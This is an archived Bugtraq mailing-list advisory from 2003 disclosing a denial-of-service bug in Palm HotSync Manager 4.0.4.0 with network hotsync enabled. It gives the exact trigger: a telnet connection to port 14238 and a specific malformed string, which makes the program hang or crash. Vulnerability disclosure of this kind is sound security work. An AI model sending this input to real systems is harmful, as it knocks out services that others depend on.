[28584] in bugtraq


DoS in Hotsync Manager (with network hotsync enabled)

daemon@ATHENA.MIT.EDU (Gary H. Jones II)
Thu Jan 23 14:02:39 2003

Message-ID: <000901c2c27d$fd96e360$a801a8c0@eniac>
From: "Gary H. Jones II" <gary@pointblanksecurity.com>
To: <bugtraq@securityfocus.com>
Date: Wed, 22 Jan 2003 20:23:09 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Tested with HotSync Manager version 4.0.4.0

If you connect to the port HotSync Manager listens on for a network request
telnet 127.0.0.1 14238

And send the data "OK    ATDT<" followed by CRLF

A message will appear
"Out of memory. Please free some memory, then choose retry"
It will give you options for abort, retry, ignore.

If you choose ignore, or retry, Hotsync Manager will just hang until the process is terminated.
If you choose abort, you get "Runtime Error!" abnormal program termination, and it will close.

I haven't seen this particular type of DoS on HotSync Manager anywhere.

Regards,
Gary H. Jones II
Point Blank Security
www.pointblanksecurity.com


